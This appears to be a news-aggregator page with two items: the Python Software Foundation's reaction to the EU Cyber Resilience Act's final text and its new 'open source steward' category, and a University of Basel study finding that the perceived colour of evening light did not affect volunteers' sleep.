They'd worried that the Python Software Foundation could incur financial liabilities just for hosting Python and its PyPI package repository due to the proposed law's attempts to penalize cybersecurity lapses all the way upstream. But a new blog post this week cites some improvements: We asked for increased clarity, specifically:

"Language that specifically exempts public software repositories that are offered as a public good for the purpose of facilitating collaboration would make things much clearer. We'd also like to see our community, especially the hobbyists, individuals and other under-resourced entities who host packages on free public repositories like PyPI be exempt."


The good news is that CRA text changed a lot between the time the open source community — including the PSF — started expressing our concerns and the Act's final text which was cemented on December 1st. That text introduces the idea of an "open source steward."

"'open-source software steward' means any legal person, other than a manufacturer, which has the purpose or objective to systematically provide support on a sustained basis for the development of specific products with digital elements qualifying as free and open-source software that are intended for commercial activities, and ensures the viability of those products;" (p. 76)


[...] So are we totally done paying attention to European legislation? Ah, while it would be nice for the Python community to be able to cross a few things off our to-do list, that's not quite how it works. Firstly, the concept of an "open source steward" is a brand new idea in European law. So, we will be monitoring the conversation as this new concept is implemented or interacts with other bits of European law to make sure that the understanding continues to reflect the intent and the realities of open source development. Secondly, there are some other pieces of legislation in the works that may also impact the Python ecosystem so we will be watching the Product Liability Directive and keeping up with the discussion around standard-essential patents to make sure that the effects on Python and open source development are intentional (and hopefully benevolent, or at least benign.)

Science

Seeing Blue At Night May Not Be What's Keeping You Up After All (sciencealert.com) 52

We already know that a precise range of wavelengths within daylight triggers a light-sensitive photoreceptor in the back of your eye, causing the body's internal clock to reset.

Those receptors are called "intrinsically photosensitive retinal ganglion cells" (or ipRGCs), according to Science Alert — although the actual color is perceived by some nearby cones (which then send information back to those receptors).

But are our bodies really affected specifically by the perceived color? Chronobiologist Christine Blume investigated with a team from Switzerland's University of Basel and Germany's Max Planck Institute for Biological Cybernetics: Modern scientific wisdom advises us to avoid devices that emit a significant amount of blue radiance, such as our smartphones, computer monitors, and tablets, when we ought to be wrapping ourselves in darkness and resting. There's perfectly sound reasoning for this — the ipRGCs in our eyes react to short wavelengths of electromagnetic radiation, roughly 490 nanometers in size... Given blue light scatters from the sky during daylight hours, it makes sense our eyes would use this wavelength as a cue to mark the beginning and end of sleep time...

Yet University of Basel chronobiologist Christine Blume had her suspicions that the way a light's mix of wavelengths influenced the color-reading cones could mean there's more to the phenomenon than meets the eye. "A study in mice in 2019 suggested that yellowish light has a stronger influence on the internal clock than bluish light," says Blume. To resolve whether the way cones perceive a range of wavelengths carries any weight in how the blue-triggered ipRGCs function, Blume and her team recruited eight healthy adult men and eight women in a 23-day-long experiment. After habituating to a specific bedtime for a week, the volunteers attended three visits to a lab where they were exposed to a constant controlled 'white' glow, a bright yellow, or dim blue light for one hour in the evening...

None of the analyses revealed any indication that the perceived color of the light affected the duration or quality of the volunteers' sleep patterns. Instead, all three light conditions caused a sleep delay, suggesting light in general has a more complicated impact than previously thought. That's not to say ipRGCs aren't affected by 'blue' wavelengths of light. Rather, white light that is packed with blue waves but stimulates cone cells into seeing yellows, reds, or purples could still affect our sleep cycles. Similarly, light that looks blue but isn't intense enough to provoke the ipRGCs into functioning might have little influence over our body's daily rhythms.

Phones of the future may one day allow us to switch into a night mode that we don't perceive in warmer tones.

Thanks to long-time Slashdot reader schwit1 for sharing the article.
